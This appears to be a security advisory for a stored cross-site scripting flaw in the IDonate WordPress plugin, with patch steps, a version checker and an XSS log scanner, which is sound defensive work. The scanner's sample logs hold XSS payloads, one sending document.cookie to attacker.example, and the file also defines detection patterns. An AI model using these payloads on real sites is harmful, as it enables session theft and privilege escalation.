CVE-2024-3594
📋 TL;DR
The IDonate WordPress plugin through version 1.9.0 does not sanitise and escape some of its settings values, leaving a stored cross-site scripting (XSS) flaw. A high-privilege user such as an administrator can save a script payload in the plugin settings that then executes in the browser of any user who views the affected page. This matters where administrators are normally prevented from saving raw HTML: WordPress multisite (where only super admins hold the unfiltered_html capability) and single sites with DISALLOW_UNFILTERED_HTML set, because the plugin bypasses that restriction. Fixed in 1.9.1.
💻 Affected Systems
- IDonate WordPress Plugin
📦 What is this software?
Idonate by Themeatelier
⚠️ Risk & Real-World Impact
Worst Case
A site administrator on a WordPress multisite network (where that role cannot normally insert raw HTML) stores JavaScript that runs in the browser of every user who views the affected page, including the network super admin. The script runs with the victim's session and can drive the WordPress admin interface on their behalf: creating additional accounts, granting super admin, or changing network settings, which amounts to escalation from a single site to the whole network. Session-cookie theft is less likely, since WordPress sets its authentication cookies HttpOnly, but redirecting victims to phishing pages is straightforward.
Likely Case
A malicious or compromised administrator account stores a payload that fires for the other privileged users who view the settings or the rendered page, leading to escalation beyond the attacker's own role (site admin to super admin on multisite) or to theft of data those users can see.
If Mitigated
With the plugin updated to 1.9.1 or removed, the issue is closed. If only the administrator role is tightly controlled (few accounts, MFA, activity logging) while the plugin stays unpatched, the residual risk is a rogue or compromised administrator. On a single site where administrators already hold unfiltered_html, the flaw adds little beyond what that role can do anyway.
🎯 Exploit Status
Exploitation requires an authenticated account with access to the plugin's settings page, i.e. an administrator. The root cause is that these settings are stored and rendered without sanitisation or escaping, so a payload saved once fires every time the affected page is loaded. This is only a meaningful attack where administrators lack the unfiltered_html capability (multisite, or DISALLOW_UNFILTERED_HTML); elsewhere an administrator can already insert arbitrary HTML through normal means.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.9.1 or later
Vendor Advisory: https://wpscan.com/vulnerability/7a8a834a-e5d7-4678-9d35-4390d1200437/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the IDonate plugin and click 'Update Now' if an update is offered.
4. Alternatively, download the latest version from the WordPress plugin repository and replace the plugin files.
🔧 Temporary Workarounds
Remove IDonate Plugin
Linux (WP-CLI): temporarily deactivate, or remove, the vulnerable plugin until it can be updated. Deactivating stops both the settings page and the front-end output that renders the stored values; deleting also removes the files from disk.
wp plugin deactivate idonate
wp plugin delete idonate
Restrict Admin Access
All platforms: keep the administrator role to the smallest possible set of accounts, require MFA for them, and log and review changes to plugin settings. On multisite this is the control that matters, since site administrators there are not normally trusted with unfiltered HTML.
🧯 If You Can't Patch
- Restrict the administrator role to as few accounts as possible and require multi-factor authentication for each; the flaw can only be exercised by someone already holding that role
- Deploy WAF rules that inspect the plugin's settings form submissions for script payloads, but treat this as a weak, secondary control: the attacker is an authenticated administrator submitting a legitimate form, and a rule that only matches "<script>" will miss event-handler attributes (onerror=, onload=) and URL- or entity-encoded payloads
- On multisite, network-deactivate the plugin until 1.9.1 can be rolled out to every site
🔍 How to Verify
Check if Vulnerable:
In the WordPress admin panel go to Plugins → Installed Plugins, locate IDonate and read its version: 1.9.0 or earlier is vulnerable, 1.9.1 or later is fixed. On multisite, check Network Admin → Plugins as well, since the plugin may be network-activated.
Check Version:
wp plugin get idonate --field=version
Verify Fix Applied:
Confirm that the IDonate version shown in the admin panel (or returned by the WP-CLI command above) is 1.9.1 or later. Settings values saved before the update may still hold a payload in the database; review and re-save the plugin's settings after updating.
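A version check that goes a little further than reading the number off the plugins page, added here as an example (it is not code from the advisory, from WPScan or from the IDonate plugin): it parses the JSON printed by the real WP-CLI command wp plugin list --format=json and compares versions numerically, which matters because a plain string comparison would treat a future 1.10.0 as older than 1.9.1. The sample JSON embedded in the block is constructed, not captured from a real site.

```python
"""Decide whether an installed IDonate version is in the vulnerable range.

Added example; this is not code from the advisory or from the IDonate plugin.
It reads the JSON that the real WP-CLI command `wp plugin list --format=json`
prints and compares versions numerically rather than as strings.
"""
import json
import re
import shutil
import subprocess
from typing import List, Tuple

PLUGIN_SLUG = "idonate"
FIXED_VERSION = "1.9.1"  # first release carrying the fix, per the advisory

# Constructed sample of `wp plugin list --format=json` output (not a real capture).
SAMPLE_WP_CLI_OUTPUT = json.dumps([
    {"name": "idonate", "status": "active", "update": "available", "version": "1.9.0"},
    {"name": "akismet", "status": "inactive", "update": "none", "version": "5.3"},
])


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.9.0' (or '1.9.0-beta1') into a tuple of ints for comparison.

    Comparing as strings would be wrong: "1.10.0" < "1.9.1" is True in
    Python because '1' sorts before '9', yet 1.10.0 would be the newer release.
    """
    numbers = re.findall(r"\d+", version.split("-", 1)[0])
    return tuple(int(n) for n in numbers) or (0,)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly older than the fixed release."""
    return parse_version(version) < parse_version(fixed)


def find_vulnerable_plugins(plugin_list_json: str,
                            slug: str = PLUGIN_SLUG) -> List[Tuple[str, str, str]]:
    """Return (slug, version, status) for every matching install that is vulnerable.

    Inactive copies are reported too: the files are still on disk and one
    click re-enables them, so they should be updated or deleted as well.
    On multisite WP-CLI reports network-activated plugins as 'active-network'.
    """
    hits = []
    for plugin in json.loads(plugin_list_json):
        if plugin.get("name") == slug and is_vulnerable(str(plugin.get("version", "0"))):
            hits.append((plugin["name"], plugin["version"], plugin.get("status", "unknown")))
    return hits


def current_plugin_list_json() -> str:
    """Use WP-CLI when available (run from the WordPress root); else the sample."""
    if shutil.which("wp"):
        result = subprocess.run(["wp", "plugin", "list", "--format=json"],
                                check=True, capture_output=True, text=True)
        return result.stdout
    return SAMPLE_WP_CLI_OUTPUT


if __name__ == "__main__":
    for slug_, version_, status_ in find_vulnerable_plugins(current_plugin_list_json()):
        print(f"VULNERABLE: {slug_} {version_} ({status_}) - update to {FIXED_VERSION} or later")
```

Run it from the WordPress root on a host with WP-CLI installed; without WP-CLI it falls back to the constructed sample so the logic can be exercised offline.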
📡 Detection & Monitoring
Log Indicators:
- Unusual admin activity modifying plugin settings
- JavaScript payloads in plugin setting updates
Network Indicators:
- Requests to plugin settings endpoints with script tags or JavaScript payloads
SIEM Query (illustrative pseudo-syntax; adapt the field names and operators to your platform, and note that matching only "<script>" and "javascript:" misses event-handler attributes such as onerror= and URL- or entity-encoded payloads):
source="wordpress" AND (event="plugin_settings_update" OR event="option_update") AND (data CONTAINS "<script>" OR data CONTAINS "javascript:")
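The log indicators above turned into detection logic run over sample events, added as an example (not code from the advisory or from the plugin). The log format is an assumption: one JSON object per line with ts, user, event, option and value fields, as an activity-log plugin or a custom update_option hook might produce. The event names option_update and plugin_settings_update are taken from the SIEM query above; the sample lines, the user names and the attacker.example host are constructed. It decodes URL and HTML-entity encoding and matches event-handler attributes, so it catches payloads that a literal "<script>" match would miss.

```python
"""Flag stored-XSS payloads in logged WordPress option / plugin-setting updates.

Added example; not code from the advisory or from IDonate. The log format is
an assumption: one JSON object per line with ts, user, event, option and
value fields, as an activity-log plugin or a custom update_option hook might
emit. Values are decoded before matching and event-handler attributes are
matched, so payloads without a literal "<script>" are still caught.
"""
import html
import json
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Heuristic indicators of a script payload in a settings value. Each regex is
# applied after decoding; expect to tune for false positives in real logs.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),              # onerror=, onload=, onmouseover=
    re.compile(r"<\s*(svg|iframe|object|embed)\b", re.I),
]

RELEVANT_EVENTS = {"option_update", "plugin_settings_update"}

# Constructed sample log lines (not real captures).
SAMPLE_LOG_LINES = [json.dumps(e) for e in [
    {"ts": "2024-04-10T09:12:01Z", "user": "alice", "event": "option_update",
     "option": "idonate_currency", "value": "USD"},
    {"ts": "2024-04-10T09:13:44Z", "user": "mallory", "event": "option_update",
     "option": "idonate_thank_you_message",
     "value": "Thanks!<script>fetch('https://attacker.example/?c='+document.cookie)</script>"},
    {"ts": "2024-04-10T09:14:02Z", "user": "mallory", "event": "plugin_settings_update",
     "option": "idonate_footer_text",
     "value": "<img src=x onerror=alert(document.domain)>"},       # no <script> tag at all
    {"ts": "2024-04-10T09:14:30Z", "user": "mallory", "event": "option_update",
     "option": "idonate_form_title",
     "value": "%3Csvg%20onload%3Dalert(1)%3E"},                    # URL-encoded payload
    {"ts": "2024-04-10T09:15:00Z", "user": "mallory", "event": "option_update",
     "option": "blogdescription", "value": "<script>alert(1)</script>"},  # not an IDonate option
    {"ts": "2024-04-10T09:16:00Z", "user": "alice", "event": "user_login"},
]]


def normalise(value: str) -> str:
    """Strip up to two layers of URL and HTML-entity encoding before matching."""
    decoded = value
    for _ in range(2):
        decoded = html.unescape(unquote(decoded))
    return decoded


def is_suspicious(value: str) -> bool:
    """Return True if the decoded value matches any XSS indicator."""
    text = normalise(value)
    return any(p.search(text) for p in XSS_PATTERNS)


def scan_option_updates(log_lines: List[str],
                        option_prefix: Optional[str] = "idonate") -> List[Dict[str, str]]:
    """Return one alert per settings update whose value looks like a script payload.

    option_prefix limits alerts to this plugin's options; pass None to flag
    any option, which is the better default once the plugin is patched.
    """
    alerts = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue                      # malformed line, skip it
        if event.get("event") not in RELEVANT_EVENTS:
            continue
        option = str(event.get("option", ""))
        if option_prefix is not None and not option.startswith(option_prefix):
            continue
        value = str(event.get("value", ""))
        if is_suspicious(value):
            alerts.append({"ts": str(event.get("ts", "")), "user": str(event.get("user", "")),
                           "option": option, "value": value})
    return alerts


if __name__ == "__main__":
    for alert in scan_option_updates(SAMPLE_LOG_LINES):
        print(f"{alert['ts']} {alert['user']} set {alert['option']}: {alert['value'][:60]!r}")
```

Against the sample, the plain query above would have caught only the first of mallory's three IDonate writes; the decoded, handler-aware match flags all three and skips alice's harmless currency change.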